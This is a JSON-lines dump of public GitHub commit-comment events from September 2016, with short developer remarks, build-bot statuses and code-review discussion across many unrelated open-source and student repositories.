{"id":"4536633364","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18952934,"position":null,"line":null,"path":null,"commit_id":"17eea5f2cbf24df9186a60480f550e8b0da61c14","created_at":"2016-09-08T21:01:40Z","updated_at":"2016-09-08T21:01:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;OnBAu5wH&#x2F;28-finalise-structure-remove-gulp-and-add-sass-compiling-with-webpack\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Finalise Structure, remove gulp and add sass compiling with webpack</a>"}},"created_at":"2016-09-08T21:01:40Z"}
{"id":"4536635976","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18952947,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T21:02:10Z","updated_at":"2016-09-08T21:02:10Z","body":"@Blystad indeed 100MiB :-P\r\n\r\nNormally the file is 125MiB, but with compression it is less than 50MiB.\r\n\r\nWe can't use git LFS with github because it is expensive :-/\r\nAlso this will only be need for probably just this APK, officially APKs in the Play Store are not allowed to be lager than 100MB so probably Google just made an exception for themselves."}},"created_at":"2016-09-08T21:02:10Z"}
{"id":"4536637445","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952955,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T21:02:24Z","updated_at":"2016-09-08T21:02:24Z","body":"Might be helpful for the 'before trying again': http://momentjs.com/docs/#/durations/humanize/"}},"created_at":"2016-09-08T21:02:24Z"}
{"id":"4536638248","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18952959,"position":null,"line":null,"path":null,"commit_id":"91eb33255b1adb3dbc2a16bfa008cb6e23a77ac7","created_at":"2016-09-08T21:02:33Z","updated_at":"2016-09-08T21:02:33Z","body":":+1: "}},"created_at":"2016-09-08T21:02:33Z"}
{"id":"4536640922","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18952969,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T21:03:05Z","updated_at":"2016-09-08T21:03:05Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-08T21:03:05Z"}
{"id":"4536642499","type":"CommitCommentEvent","actor":{"login":"emmett9001"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":18952976,"position":null,"line":null,"path":null,"commit_id":"8e79985fd6e6aa865beef862371f8af54a646508","created_at":"2016-09-08T21:03:23Z","updated_at":"2016-09-08T21:03:23Z","body":"Typo, this actually fixes #590 "}},"created_at":"2016-09-08T21:03:23Z"}
{"id":"4536647391","type":"CommitCommentEvent","actor":{"login":"leezer3"},"repo":{"name":"leezer3/OpenBVE"},"payload":{"comment":{"id":18952991,"position":null,"line":null,"path":null,"commit_id":"242a2394e30bdffb5b4db5c84fdf44bc42839f1b","created_at":"2016-09-08T21:04:20Z","updated_at":"2016-09-08T21:04:20Z","body":"Always remember to validate your input, else bad things happen......"}},"created_at":"2016-09-08T21:04:20Z"}
{"id":"4536648105","type":"CommitCommentEvent","actor":{"login":"axfelix"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18952994,"position":null,"line":null,"path":null,"commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-08T21:04:27Z","updated_at":"2016-09-08T21:04:27Z","body":"Just installed on an OJS 3 instance to test (I was able to clone the plugin repo directly into the plugins directly and have it just work, which was very nice) and it looks great. Thanks a ton for this.\r\n\r\nTwo comments:\r\n- I think we should probably remove the option for HTML output from the OJS3 plugin because OJS3 ships with Lens Viewer for a nice web view of the raw XML.\r\n- Should default to pkp-xml-demo rather than pkp-xml-test.lib.sfu.ca."}},"created_at":"2016-09-08T21:04:27Z"}
{"id":"4536649272","type":"CommitCommentEvent","actor":{"login":"BernardoGiordano"},"repo":{"name":"sgtkwol/EventAssistant"},"payload":{"comment":{"id":18952998,"position":null,"line":null,"path":null,"commit_id":"b361588c01d7e915520e1a8ec940008f5e933961","created_at":"2016-09-08T21:04:40Z","updated_at":"2016-09-08T21:04:40Z","body":"This should go as 1515, the alternate event is different"}},"created_at":"2016-09-08T21:04:40Z"}
{"id":"4536650758","type":"CommitCommentEvent","actor":{"login":"ipw012"},"repo":{"name":"ipw012/RIVER"},"payload":{"comment":{"id":18953008,"position":null,"line":null,"path":null,"commit_id":"5faed0e2eaeed19f1a68285721c1d5a73442b9ba","created_at":"2016-09-08T21:04:58Z","updated_at":"2016-09-08T21:04:58Z","body":"Thank you so much, David! Your valuable comments motivated me a lot for making them much better. I will make our code publicly available via CRAN as R package soon."}},"created_at":"2016-09-08T21:04:58Z"}
{"id":"4536651179","type":"CommitCommentEvent","actor":{"login":"Pythexx"},"repo":{"name":"Pythexx/pythexx-git-test"},"payload":{"comment":{"id":18953010,"position":null,"line":null,"path":null,"commit_id":"4dd43012a2a707885c773e2dde6371801ece69a1","created_at":"2016-09-08T21:05:03Z","updated_at":"2016-09-08T21:05:03Z","body":"is this a comment?"}},"created_at":"2016-09-08T21:05:03Z"}
{"id":"4536651623","type":"CommitCommentEvent","actor":{"login":"Pythexx"},"repo":{"name":"Pythexx/pythexx-git-test"},"payload":{"comment":{"id":18953011,"position":4,"line":12,"path":"index.html","commit_id":"4dd43012a2a707885c773e2dde6371801ece69a1","created_at":"2016-09-08T21:05:09Z","updated_at":"2016-09-08T21:05:09Z","body":"what"}},"created_at":"2016-09-08T21:05:09Z"}
{"id":"4536653776","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/ui-prototype"},"payload":{"comment":{"id":18953015,"position":1,"line":1,"path":".gitignore","commit_id":"4a1cf0234ee1eb48f8e61c72fe4311fd1f2d2218","created_at":"2016-09-08T21:05:33Z","updated_at":"2016-09-08T21:05:33Z","body":"Wooops. What I've done."}},"created_at":"2016-09-08T21:05:33Z"}
{"id":"4536664929","type":"CommitCommentEvent","actor":{"login":"drewish"},"repo":{"name":"domaindrivendev/swagger_rails"},"payload":{"comment":{"id":18953051,"position":4,"line":56,"path":"lib/swagger_rails/rspec/formatter.rb","commit_id":"1bd138b0fb68db1b4d2c859aae82971007f4f074","created_at":"2016-09-08T21:07:40Z","updated_at":"2016-09-08T21:07:40Z","body":"i'm curious why the method ended up named `operation_description` when it maps back to `description`. was it to avoid an rspec method name? it just makes it harder to match the DSL up with the Swagger spec."}},"created_at":"2016-09-08T21:07:40Z"}
{"id":"4536668878","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18953056,"position":4,"line":613,"path":"win/VC140/game.vcxproj","commit_id":"9e27f11af65e20903aa86d578eb498a002078341","created_at":"2016-09-08T21:08:26Z","updated_at":"2016-09-08T21:08:26Z","body":"No love for V120 ? or CMake?"}},"created_at":"2016-09-08T21:08:26Z"}
{"id":"4536671701","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"AlenOsmanagic/Zadace"},"payload":{"comment":{"id":18953065,"position":null,"line":null,"path":null,"commit_id":"37a50c70b84aff380d61af72a76693db848050e9","created_at":"2016-09-08T21:08:58Z","updated_at":"2016-09-08T21:08:58Z","body":"kakav ti imas racunar? jel neki hackintosh? mozda da vidis ovaj sto je u wipu?\r\n"}},"created_at":"2016-09-08T21:08:58Z"}
{"id":"4536672809","type":"CommitCommentEvent","actor":{"login":"rsennrich"},"repo":{"name":"rsennrich/nematus"},"payload":{"comment":{"id":18953070,"position":null,"line":null,"path":null,"commit_id":"225b4015be56abd003d428b4d4c9fdd02d15b888","created_at":"2016-09-08T21:09:10Z","updated_at":"2016-09-08T21:09:10Z","body":"breaks backward-compatibility. reverted for now."}},"created_at":"2016-09-08T21:09:10Z"}
{"id":"4536672996","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/cabal2nix"},"payload":{"comment":{"id":18953072,"position":null,"line":null,"path":null,"commit_id":"22311078120b9531c9185328fecb130824d1ddc9","created_at":"2016-09-08T21:09:12Z","updated_at":"2016-09-08T21:09:12Z","body":"I should have looked closer---this is not a complete solution: the package itself builds, but nothing that depends on it will, because `librarySystemDepends` doesn't propagate; that's why I chose `buildDepends`, because it's one of the three things (`libraryHaskellDepends` and `executableHaskellDepends` being the other two) that get put into `propagatedBuildInputs`.\r\n\r\nAn alternative would be to add this expression to the 'gstLibAudioOverrides` function, which I just verified works as well."}},"created_at":"2016-09-08T21:09:12Z"}
{"id":"4536679322","type":"CommitCommentEvent","actor":{"login":"Blystad"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18953082,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T21:10:24Z","updated_at":"2016-09-08T21:10:24Z","body":"1GB of bandwidth free...yep.. 5$ per 50GiB...yep...nope...Alright I see your point. I'll fix something."}},"created_at":"2016-09-08T21:10:24Z"}
{"id":"4536680111","type":"CommitCommentEvent","actor":{"login":"bruce-willis"},"repo":{"name":"bruce-willis/Online-Shop"},"payload":{"comment":{"id":18953083,"position":null,"line":null,"path":null,"commit_id":"42adfae396c904f7768c598e013ff77a83784ced","created_at":"2016-09-08T21:10:33Z","updated_at":"2016-09-08T21:10:33Z","body":"Very important part is here\r\n`services.AddIdentity<ApplicationUser, IdentityRole>(options =>\r\n            {\r\n              options.Password.RequireDigit = false;\r\n              options.Password.RequireLowercase = false;\r\n              options.Password.RequireNonAlphanumeric = false ;\r\n              options.Password.RequireUppercase = false;\r\n              options.Password.RequiredLength = 6;\r\n            }`\r\nIt turn off excessive password check parameters"}},"created_at":"2016-09-08T21:10:33Z"}
{"id":"4536686841","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953093,"position":null,"line":null,"path":null,"commit_id":"4856531eeb3fc373f9ea9bbb4bb95c3406182d90","created_at":"2016-09-08T21:11:52Z","updated_at":"2016-09-08T21:11:52Z","body":"radiance_measure_2.0 (rpg777) - x86_64-MacOS-10.10-clang: OK (2378 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.14%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T21:11:52Z"}
{"id":"4536688863","type":"CommitCommentEvent","actor":{"login":"jcredding"},"repo":{"name":"redding/mr"},"payload":{"comment":{"id":18953097,"position":null,"line":null,"path":null,"commit_id":"1740ef9626eaa9251a8db71aed7a862a4da96804","created_at":"2016-09-08T21:12:17Z","updated_at":"2016-09-08T21:12:17Z","body":"/cc @kellyredding "}},"created_at":"2016-09-08T21:12:17Z"}
{"id":"4536696653","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18953111,"position":null,"line":null,"path":null,"commit_id":"83673bc505e75f40793d5dba88c88113f026d555","created_at":"2016-09-08T21:13:46Z","updated_at":"2016-09-08T21:13:46Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3914\n"}},"created_at":"2016-09-08T21:13:46Z"}
{"id":"4536698532","type":"CommitCommentEvent","actor":{"login":"sckirk"},"repo":{"name":"sckirk/FarMar"},"payload":{"comment":{"id":18953117,"position":null,"line":null,"path":null,"commit_id":"e7ad541ce92173b3786c755ce933075a10908390","created_at":"2016-09-08T21:14:10Z","updated_at":"2016-09-08T21:14:10Z","body":"Also updated the self.by_market method (in Vendor class) as well as the self.by_vendor method (in Product class) to remove a local variable that isn't needed. Thank you to Heather for seeing in her code that \"return\" works beautifully in situations like these."}},"created_at":"2016-09-08T21:14:10Z"}
{"id":"4536709930","type":"CommitCommentEvent","actor":{"login":"zen524"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953154,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:16:24Z","updated_at":"2016-09-08T21:16:24Z","body":"Oh, wait, is our lab done then?\n\n\n-Eric C. Whitaker\n________________________________\nFrom: Kovee98 <notifications@github.com>\nSent: Wednesday, September 7, 2016 9:57:19 PM\nTo: Kovee98/Lab3\nCc: Eric C Whitaker; Author\nSubject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n\n\nthe rest of the .cpp\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18939316>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUWzmycZouIoI7rz-JpFOAoPofCkl93oks5qn4efgaJpZM4J3lly>.\n"}},"created_at":"2016-09-08T21:16:24Z"}
{"id":"4536714830","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"xhoogland/Monique"},"payload":{"comment":{"id":18953175,"position":null,"line":null,"path":null,"commit_id":"bed0f4eac45f68f396566e1cd45af059a9b8c05b","created_at":"2016-09-08T21:17:19Z","updated_at":"2016-09-08T21:17:19Z","body":"#2"}},"created_at":"2016-09-08T21:17:19Z"}
{"id":"4536717557","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953199,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:17:50Z","updated_at":"2016-09-08T21:17:50Z","body":"no i will have it done by tonight, no worries"}},"created_at":"2016-09-08T21:17:50Z"}
{"id":"4536717876","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953200,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:17:53Z","updated_at":"2016-09-08T21:17:53Z","body":"`valid()` should definitely not call `split()`. What is the rationale for this?"}},"created_at":"2016-09-08T21:17:53Z"}
{"id":"4536721902","type":"CommitCommentEvent","actor":{"login":"CoolCanuck"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18953214,"position":null,"line":null,"path":null,"commit_id":"96cbe10d41ed3fdc5830875824a2e1e52b71d0d8","created_at":"2016-09-08T21:18:40Z","updated_at":"2016-09-08T21:18:40Z","body":"@FrostTheFox  this change is most welcome. Hybrid is a great feature to have!!"}},"created_at":"2016-09-08T21:18:40Z"}
{"id":"4536723212","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18953219,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T21:18:56Z","updated_at":"2016-09-08T21:18:56Z","body":"With function-like syntax, we should also make these keywords reserved. Or be prepared to handle a name conflict with user-defined functions (one will silently override another)."}},"created_at":"2016-09-08T21:18:56Z"}
{"id":"4536724945","type":"CommitCommentEvent","actor":{"login":"CoolCanuck"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18953225,"position":null,"line":null,"path":null,"commit_id":"d92e8eedadf46cf25eeea0e4ca88313ed99918c2","created_at":"2016-09-08T21:19:18Z","updated_at":"2016-09-08T21:19:18Z","body":"Thank god."}},"created_at":"2016-09-08T21:19:18Z"}
{"id":"4536725449","type":"CommitCommentEvent","actor":{"login":"JasonEverardo"},"repo":{"name":"felipejhair/Crimeneitor"},"payload":{"comment":{"id":18953229,"position":null,"line":null,"path":null,"commit_id":"e59c360606012631355ca61ba90044b7d1468d11","created_at":"2016-09-08T21:19:24Z","updated_at":"2016-09-08T21:19:24Z","body":"Wow"}},"created_at":"2016-09-08T21:19:24Z"}
{"id":"4536728857","type":"CommitCommentEvent","actor":{"login":"ginkel"},"repo":{"name":"scheeles/docker-k8s-mesos"},"payload":{"comment":{"id":18953232,"position":null,"line":null,"path":null,"commit_id":"89c00ee5346a75f6efea6c0c1025ca7a00813e2e","created_at":"2016-09-08T21:20:05Z","updated_at":"2016-09-08T21:20:05Z","body":"@scheeles Ist ein wenig spät, aber könntest du bitte das Image nochmal neu bauen? Macht die Demo deutlich flüssiger wegen weniger Warterei..."}},"created_at":"2016-09-08T21:20:05Z"}
{"id":"4536729536","type":"CommitCommentEvent","actor":{"login":"CoolCanuck"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18953233,"position":null,"line":null,"path":null,"commit_id":"ed37923bc75f18a9046903bb8bf5bae233931841","created_at":"2016-09-08T21:20:14Z","updated_at":"2016-09-08T21:20:14Z","body":"@FrostTheFox  . soo.. you gonna make that name change? or?"}},"created_at":"2016-09-08T21:20:14Z"}
{"id":"4536733893","type":"CommitCommentEvent","actor":{"login":"civodul"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18953239,"position":null,"line":null,"path":null,"commit_id":"67959521490d7308084a9d8e9300125f16a5697a","created_at":"2016-09-08T21:21:05Z","updated_at":"2016-09-08T21:21:05Z","body":"Michael Raskin <notifications@github.com> skribis:\n\n> Yes, you are right…\n>\n> Basically, `pkg-config` asked for `bindir` returns a directory while the `configure` script wants that to be an executable.\n>\n> So I hack `/guile` after the detected path; next release of `libchop` should add `/guile` to the end of `$(pkg-config guile-2.0 --variable bindir)`\n\nIndeed, I’ve pushed a similar change.\n\nThanks,\nLudo’.\n"}},"created_at":"2016-09-08T21:21:05Z"}
{"id":"4536736814","type":"CommitCommentEvent","actor":{"login":"idgserpro"},"repo":{"name":"collective/collective.cover"},"payload":{"comment":{"id":18953261,"position":null,"line":null,"path":null,"commit_id":"f6a9127305068846231b6a76d3b08abcd2aeefdc","created_at":"2016-09-08T21:21:39Z","updated_at":"2016-09-08T21:21:39Z","body":"Nicely done. We can't unpin this specially because plone.tiles 1.7 will break collective.cover.\r\n\r\nCheck this commit: https://github.com/plone/plone.tiles/commit/dcd8adbf343727cd5a8c5576962b37709c3ccfb9 annotations is removed, so places that we inherit in cover will break (https://github.com/collective/collective.cover/blob/12a5396103f27262ddb4a4ca584f1f6d17de9cf3/src/collective/cover/tiles/data.py#L42)\r\n\r\n@hvelarde @rodfersou FYI"}},"created_at":"2016-09-08T21:21:39Z"}
{"id":"4536737177","type":"CommitCommentEvent","actor":{"login":"dschwartz783"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18953262,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-08T21:21:43Z","updated_at":"2016-09-08T21:21:43Z","body":"Your twitter will be in this commit for all eternity! >:)"}},"created_at":"2016-09-08T21:21:43Z"}
{"id":"4536738787","type":"CommitCommentEvent","actor":{"login":"zen524"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953264,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:22:04Z","updated_at":"2016-09-08T21:22:04Z","body":"Is there anything I can do to help?\n\n\n-Eric C. Whitaker\n________________________________\nFrom: Kovee98 <notifications@github.com>\nSent: Thursday, September 8, 2016 3:17:50 PM\nTo: Kovee98/Lab3\nCc: Eric C Whitaker; Author\nSubject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n\n\nno i will have it done by tonight, no worries\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18953199>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUWzm3zdXVRk1x8Cxi6ZWys4PWbPmh1Jks5qoHt-gaJpZM4J3lly>.\n"}},"created_at":"2016-09-08T21:22:04Z"}
{"id":"4536738880","type":"CommitCommentEvent","actor":{"login":"JeffBship"},"repo":{"name":"JeffBship/CS530-team-projects"},"payload":{"comment":{"id":18953265,"position":null,"line":null,"path":null,"commit_id":"4275fb9847d316e8c75731ab07a2e2752a9c5d34","created_at":"2016-09-08T21:22:06Z","updated_at":"2016-09-08T21:22:06Z","body":"CS530\r\nChris Harhay, Jeff Blankenship, Taylor Somma\r\n"}},"created_at":"2016-09-08T21:22:06Z"}
{"id":"4536740072","type":"CommitCommentEvent","actor":{"login":"Bizcho"},"repo":{"name":"sergio-xga/GreenNeighborhood"},"payload":{"comment":{"id":18953266,"position":null,"line":null,"path":null,"commit_id":"65ad519a36def725b47521c2ea417da7895f4f7c","created_at":"2016-09-08T21:22:19Z","updated_at":"2016-09-08T21:22:19Z","body":"Hola :D"}},"created_at":"2016-09-08T21:22:19Z"}
{"id":"4536740775","type":"CommitCommentEvent","actor":{"login":"Bizcho"},"repo":{"name":"sergio-xga/GreenNeighborhood"},"payload":{"comment":{"id":18953268,"position":null,"line":null,"path":null,"commit_id":"65ad519a36def725b47521c2ea417da7895f4f7c","created_at":"2016-09-08T21:22:27Z","updated_at":"2016-09-08T21:22:27Z","body":":pizza: "}},"created_at":"2016-09-08T21:22:27Z"}
{"id":"4536745431","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18953277,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T21:23:20Z","updated_at":"2016-09-08T21:23:20Z","body":"Thanks!\r\n@CPSC310Bot "}},"created_at":"2016-09-08T21:23:20Z"}
{"id":"4536745529","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18953279,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T21:23:22Z","updated_at":"2016-09-08T21:23:22Z","body":"Request cannot be processed. Rate limit exceeded; please wait 12 hours before trying again."}},"created_at":"2016-09-08T21:23:22Z"}
{"id":"4536745808","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953280,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:23:25Z","updated_at":"2016-09-08T21:23:25Z","body":"no its all good, man"}},"created_at":"2016-09-08T21:23:25Z"}
{"id":"4536751091","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18953292,"position":27,"line":33,"path":"src/Polly.Shared/Throttle/ThrottleEngine.cs","commit_id":"6e1c3c6ce16fe17cb66eee7109f5b359c68199be","created_at":"2016-09-08T21:24:27Z","updated_at":"2016-09-08T21:24:27Z","body":"Hmm. I am starting to see a bit more of a problem with the interleaved approach here.  Say we evolve (per previous line comments) to:\r\n```csharp\r\nif (maxQueuedActionsSemaphore.CurrentCount == 0) throw new SemaphoreRejectedException();\r\nif (!maxQueuedActionsSemaphore.Wait(TimeSpan.Zero, cancellationToken)) throw new SemaphoreRejectedException();\r\ntry\r\n{\r\n    maxParallelizationSemaphore.Wait(cancellationToken);\r\n}\r\nfinally\r\n{ \r\n    maxQueuedActionsSemaphore.Release(); // [**] Now, if anything goes wrong [exception and bale out of method] during this execution, we won't release the maxParallelizationSemaphore, so we'll have leaked a semaphore slot.  So we (in theory) need another nested try-catch here; catch and release the maxParallelizationSemaphore, then rethrow caught exception?\r\n}\r\n```\r\n\r\nStarting to look a bit complicated.\r\n\r\nI wonder if the implementation might look neater, if we adopt the suggestion in my original proposal of running the second semaphore as of size `maxParallelization + maxQueuedActions`.  What do you think?  I think we'd find the interleaving would go, and we could push the `finally { }` blocks for both semaphores to the end of the method, and wouldn't need any mind-bending try-catch-within-finally, to compensate for the interleaving.  And the overall effect would be the same: a slot in the queue-on-the-pavement would be released at the same time.  Fractionally earlier, in fact, if my reasoning is correct: it would be released by the preceding-thread-exiting-the-main-semaphore, not by the thread-able-to-gain-the-main-semaphore-because-of-the-preceding-thread-which-has-exited-the-main-semaphore.   \r\n\r\nThoughts?"}},"created_at":"2016-09-08T21:24:27Z"}
{"id":"4536751596","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18953295,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T21:24:34Z","updated_at":"2016-09-08T21:24:34Z","body":"and you pay for every clone/checkout, so it goes fast :-/"}},"created_at":"2016-09-08T21:24:34Z"}
{"id":"4536752452","type":"CommitCommentEvent","actor":{"login":"BobWhitelock"},"repo":{"name":"alces-software/clusterware"},"payload":{"comment":{"id":18953298,"position":null,"line":null,"path":null,"commit_id":"f814965f5202e6e463e3bd77bb10c3720f0973f8","created_at":"2016-09-08T21:24:45Z","updated_at":"2016-09-08T21:24:45Z","body":"Yep, that works and seems a nicer way to achieve the same effect. Thanks for the suggestion, I've pushed another commit with that change."}},"created_at":"2016-09-08T21:24:45Z"}
{"id":"4536759105","type":"CommitCommentEvent","actor":{"login":"obastemur"},"repo":{"name":"Cellule/ChakraCore"},"payload":{"comment":{"id":18953312,"position":4,"line":8,"path":"lib/Runtime/CMakeLists.txt","commit_id":"514e6154bfc925b393143424a2806215be8ea4f0","created_at":"2016-09-08T21:26:05Z","updated_at":"2016-09-08T21:26:05Z","body":"Where is this folder and CMakeLists.txt file for it located?"}},"created_at":"2016-09-08T21:26:05Z"}
{"id":"4536761302","type":"CommitCommentEvent","actor":{"login":"aldin"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18953315,"position":6,"line":41,"path":"application/model/module_refs/tree.rb","commit_id":"6c08c3330bd34650c0c5594eedc9fa6a00fe3ecf","created_at":"2016-09-08T21:26:29Z","updated_at":"2016-09-08T21:26:29Z","body":"Scenario where it can't find assembly_branch without providing version through opts is when user import module version without master (base) version. And try to stage service instance from that specific module, it will fail because it will try to get assembly branch first and since assembly branch does not exist yet it will try to create if from base (master) version and it will fail because master version of that module does not exist.\r\n"}},"created_at":"2016-09-08T21:26:29Z"}
{"id":"4536762577","type":"CommitCommentEvent","actor":{"login":"zen524"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953317,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:26:43Z","updated_at":"2016-09-08T21:26:43Z","body":"You been pushing your code?\n\n\n-Eric C. Whitaker\n________________________________\nFrom: Kovee98 <notifications@github.com>\nSent: Thursday, September 8, 2016 3:23:25 PM\nTo: Kovee98/Lab3\nCc: Eric C Whitaker; Author\nSubject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n\n\nno its all good, man\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18953280>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUWzm129YAkx3A9Uf9oAMcOmUW3q9d7Wks5qoHzNgaJpZM4J3lly>.\n"}},"created_at":"2016-09-08T21:26:43Z"}
{"id":"4536762757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18953318,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T21:26:45Z","updated_at":"2016-09-08T21:26:45Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-08T21:26:45Z"}
{"id":"4536763673","type":"CommitCommentEvent","actor":{"login":"BalusC"},"repo":{"name":"omnifaces/omnifaces"},"payload":{"comment":{"id":18953320,"position":null,"line":null,"path":null,"commit_id":"91c529b0e1b079a5c0d345d7933ec5e8142aae03","created_at":"2016-09-08T21:26:56Z","updated_at":"2016-09-08T21:26:56Z","body":"\"px\" is obviously \"chars\" :)"}},"created_at":"2016-09-08T21:26:56Z"}
